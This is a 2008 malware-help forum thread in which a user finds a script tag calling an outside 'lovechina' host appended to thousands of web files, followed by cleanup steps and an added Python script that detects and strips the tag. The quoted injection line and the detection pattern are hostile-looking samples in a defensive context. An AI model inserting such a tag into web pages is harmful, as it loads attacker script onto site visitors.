Weird Script in all PHP and HTML

Discussion in 'Malware Help - MG (A Specialist Will Reply)' started by chowe50, Nov 9, 2008.

  1. chowe50

    chowe50 Private E-2

    I have found a weird script that automatically inserts itself in all PHP and HTML code that I generate on my machine.

    I ran all the clean utilities here on MG to get rid of some other malware and thanks a million it worked.

    Here is what I have found in all my code:

    <script src=http://tw.love_china.tw._cn/count/js/gif.gif></script>

    I intentionally added an Underscore after love and tw(dot).

    It will insert itself at the bottom of every code page.

    Has anyone ever heard of this irritating script? I know it must be a Trojan and from what I have found maybe a W32 variety.

    TIA

    Charlie Howe
    The problem is that it tries to go to the site and Macromedia will error out when I try to open it.
     
  2. bjgarrick

    bjgarrick MajorGeeks Admin - Malware Expert

    Welcome to MajorGeeks.com!

    Please follow the instructions in the below link and attach the requested logs when you finish these instructions.


    • If something does not run, write down the info to explain to us later but keep on going.
    • Do not assume that because one step does not work that they all will not.
    Notes:
    1. If you run into problems trying to run the READ & RUN ME or any of the scans in normal boot mode, you can run the steps in safe boot mode, but make sure you tell us what you did later when you post logs. See the below if you do not know how to boot in safe mode:
    2. If you have problems downloading on the problem PC, download the tools on another PC and burn them to a CD. Then copy them to the problem PC. You will have to skip getting updates if (and only if) your internet connection does not work. Yes, you could use a flash drive too, but flash drives are writeable and infections can spread to them.
     
  3. chowe50

    chowe50 Private E-2

    Ok, I have done all the steps over 3 hours worth...

    I still get the malware code inserted into my HTML editor (FP2003).

    Attached are the logs as you wished.

    Note that the "nortons.exe" is still running and nothing removed it. I believe that is a worm, is it not?

    TIA

    Charlie Howe
     


  4. chowe50

    chowe50 Private E-2

    Adding last log file...

    Charlie Howe
     


  5. bjgarrick

    bjgarrick MajorGeeks Admin - Malware Expert

    Pre-Instructions:
    1. First, please disable any antivirus and/or antispy programs you have installed so they will not block this fix.
    2. Print out these instructions or save them to a text file so that you can operate with All Browser Windows CLOSED.

    Step 1:
    Run C:\MGtools\analyse.exe by double clicking on it (Note: if using Vista, don't double click, use right click and select Run As Administrator). This is really HijackThis (select Do a system scan only) and select the following lines but DO NOT CLICK FIX until you exit all browser sessions including the one you are reading in right now:
    Again, make sure ALL browser windows are closed when you click FIX.

    Step 2:
    Now we need to use ComboFix to remove a bunch of malware files.
    • Make sure that combofix.exe that you downloaded while doing the READ & RUN ME is on your Desktop but Do not run it!
      • If it is not on your Desktop, the below will not work.
    • Open Notepad and copy/paste the text in the below quote box into it:
    • Save the above as CFscript.txt and make sure you save it to the same location (should be on your Desktop) as ComboFix.exe
    • At this point, you MUST EXIT ALL BROWSERS NOW before continuing!
    • You should have both the ComboFix.exe and CFScript.txt icons on your Desktop.
    • Now use your mouse to drag CFscript.txt on top of ComboFix.exe
    • Follow the prompts.
    • When it finishes, a log will be produced named c:\combofix.txt
    • I will ask for this log below
    Note:

    Do not mouseclick combofix's window while it is running. That may cause it to stall.

    Step 3:
    Default Security Settings

    To Default Security Settings:
    For Internet Explorer 6 users:
    Click Start > Run > type inetcpl.cpl and press ENTER, when Internet Properties comes up navigate to the Security Tab and click Default Level for the following:
    • Internet
    • Local Intranet
    • Trusted Sites
    • Restricted Sites.
    Click OK to exit.

    For Internet Explorer 7 users:
    Click Start > Run > type inetcpl.cpl and press ENTER, when Internet Properties comes up, navigate to the Security Tab and simply click the "Reset all zones to default level" button. Click OK to exit.

    Step 4:
    Please download ATF Cleaner by Atribune. This program does not require an installation. The executable actually runs the program.

    NOTE: This program is for Windows XP and Windows 2000 only. ATF Cleaner will remove all files from the items that are checked, so if you have some cookies you'd like to save, please move them to a different directory first.
    • Double-click ATF-Cleaner.exe to run the program.
    • Under Main choose: Select All
    • Click the Empty Selected button.
    If you use Firefox browser
    • Click Firefox at the top and choose: Select All
    • Click the Empty Selected button.
      • NOTE: If you would like to keep your saved passwords, please click No at the prompt.
    If you use Opera browser
    • Click Opera at the top and choose: Select All
    • Click the Empty Selected button.
      • NOTE: If you would like to keep your saved passwords, please click No at the prompt.
    Click Exit on the Main ATF Cleaner menu to close the program.


    Step 5:
    Now run the C:\MGtools\GetLogs.bat file by double clicking on it (Note: if using Vista, don't double click, use right click and select Run As Administrator).

    Then attach the below logs:
    • C:\ComboFix.txt
    • C:\MGlogs.zip
    Let me know of any problems you may have encountered with the above instructions and also let me know how things are running now.
     
  6. chowe50

    chowe50 Private E-2

    BJ,

    Thanks for all of your help!

    Unfortunately, I still have the code inserted by something!

    See the attached image.

    Also see the logs attached.

    I appreciate you guys!

    Charlie
     


  7. bjgarrick

    bjgarrick MajorGeeks Admin - Malware Expert

    First, are you familiar with the below items?

    Now we need to use ComboFix to remove a few items.
    • Make sure that combofix.exe that you downloaded while doing the READ & RUN ME is on your Desktop but Do not run it!
      • If it is not on your Desktop, the below will not work.
    • Open Notepad and copy/paste the text in the below quote box into it:
    • Save the above as CFscript.txt and make sure you save it to the same location (should be on your Desktop) as ComboFix.exe
    • At this point, you MUST EXIT ALL BROWSERS NOW before continuing!
    • You should have both the ComboFix.exe and CFScript.txt icons on your Desktop.
    • Now use your mouse to drag CFscript.txt on top of ComboFix.exe
    • Follow the prompts.
    • When it finishes, a log will be produced named c:\combofix.txt
    • I will ask for this log below
    Note:

    Do not mouseclick combofix's window while it is running. That may cause it to stall.

    Once you complete this post, attach the new ComboFix Log.
     
  8. chowe50

    chowe50 Private E-2

    Thanks BJ,

    Still have the same problem...

    Could the FP 2003 have a default page that has been updated by a virus? The problem still happens. We may have gotten the infected files, but this seems to be a remnant it left behind.

    Attached is the combofix log file.

    Any other Ideas??

    I know that this is perplexing, and I really appreciate your time.


    BTW - Internet Marketing Center, MLM3 and webpage downloader, I am familiar with...

    Charlie Howe
    Dallas, TX ( formerly LA Guy - Lower Alabama);)
     


  9. chowe50

    chowe50 Private E-2

    BJ,

    OMG.....

    I have done a search on my machine and found that over 4000 HTML files contain "lovechina".

    Some of the files I have had on my machine are dated as early as 2003???:cry

    It is the last line in the HTML files.

    Obviously, I have not opened ALL of the files, but the "lovechina" code is the last line in EVERY file!

    This is a BIG deal, because the web pages that have been generated try to run that malicious script every time they are accessed.

    Please help!

    Charlie
     
  10. chowe50

    chowe50 Private E-2

    BJ, et al.

    Great News,

    I downloaded a little tool called Turbo SR and it went through my whole hard drive and replaced all of the instances of the "lovechina" script with " ".

    It found and replaced the strings on HTM, HTML, PHP and JS files where the malware had put the malicious code.

    I feel strongly that your help getting rid of the malicious routines has helped me tremendously.

    Now all I had to do was clean up the templates and the other files where it had already placed itself. Use of the TurboSR was priceless. It is a FREE download.

    Thanks so much for your help and have a great weekend! :wave

    Charlie Howe
    Dallas, TX
     
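    A defensive file-content sweep equivalent to the search-and-replace step described in this post, as an added example that is not part of the thread and not Turbo SR itself: it walks the same HTM/HTML/PHP/JS extensions, reports which files carry the injected `<script>` tag, and strips it only when asked. The sample files and the `.invalid` host in them are constructed for the demo; the match key is the "lovechina" host marker the poster searched for.

```python
import re
import tempfile
from pathlib import Path

# The tag the thread describes: a <script> whose src points at the "lovechina"
# host, appended as the last line of every .htm/.html/.php/.js file.
# Matching on the host marker (not the full URL) also catches path variants.
INJECTED_TAG = re.compile(
    r'<script\s+src=["\']?[^"\'>\s]*lovechina[^"\'>\s]*["\']?\s*>\s*</script>\s*',
    re.IGNORECASE,
)
EXTENSIONS = {".htm", ".html", ".php", ".js"}

def strip_injected_script(text):
    """Return (cleaned_text, number_of_tags_removed) for one file's content."""
    return INJECTED_TAG.subn("", text)

def scan_tree(root, fix=False):
    """Map each infected file (relative path) to its tag count; rewrite only when fix=True."""
    hits = {}
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in EXTENSIONS:
            continue
        text = path.read_text(encoding="utf-8", errors="surrogateescape")
        cleaned, n = strip_injected_script(text)
        if n:
            hits[str(path.relative_to(root))] = n
            if fix:
                path.write_text(cleaned, encoding="utf-8", errors="surrogateescape")
    return hits

# Constructed sample files (not the poster's) with the tag appended the way the
# thread describes; the host is a placeholder under the reserved .invalid TLD.
SAMPLE_TAG = "<script src=http://tw.lovechina.example.invalid/count/js/gif.gif></script>\n"
SAMPLES = {
    "index.html": "<html><body>hello</body></html>\n" + SAMPLE_TAG,
    "page.php": "<?php echo 'hi'; ?>\n" + SAMPLE_TAG,
    "app.js": "var x = 1;\n",                # clean file, must be left untouched
    "notes.txt": "keep me\n" + SAMPLE_TAG,   # wrong extension, never scanned
}

def demo():
    """Build the samples in a temp dir, clean them, and return (before, after) hit maps."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        for name, body in SAMPLES.items():
            (root / name).write_text(body, encoding="utf-8")
        before = scan_tree(root, fix=True)   # report and strip
        after = scan_tree(root)              # re-scan: nothing should remain
        return before, after

if __name__ == "__main__":
    print(demo())
```

    Run it without `fix=True` first to get a report only; the clean `.js` file and the out-of-scope `.txt` file show that the sweep touches only what matches.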
  11. bjgarrick

    bjgarrick MajorGeeks Admin - Malware Expert

    I did not see this in your logs; the reason is that the logs we use do not show files that have been there a while, as it appears these have been.

    Are you having any current problems?
     
  12. chowe50

    chowe50 Private E-2

    BJ,

    All seems to be OK now!

    I have been in Dreamweaver and FP all day re-uploading over 1280 HTML pages out to the internet!

    I really appreciate what you did for me!

    One question:

    Why did I never find an instance anywhere on the Internet, in all of my searches, of any other person having had this type of malware?

    I searched for the string "lovechina" everywhere and even tried to check some forums for HTML code involuntary inserts.

    I had that string in over 4800 files. It sure had to be some malicious thing that put it there. I wish I knew the name of the virus/malware that put it there and I would shout it to the hills and get everyone to MG to get it fixed.

    Thanks again,

    Charlie Howe
    Dallas, TX :cool
     
  13. bjgarrick

    bjgarrick MajorGeeks Admin - Malware Expert

    The names malware uses vary, so no infection is the same. It's hard to say how this happened, but it was probably one of the malware files that put it there.
     
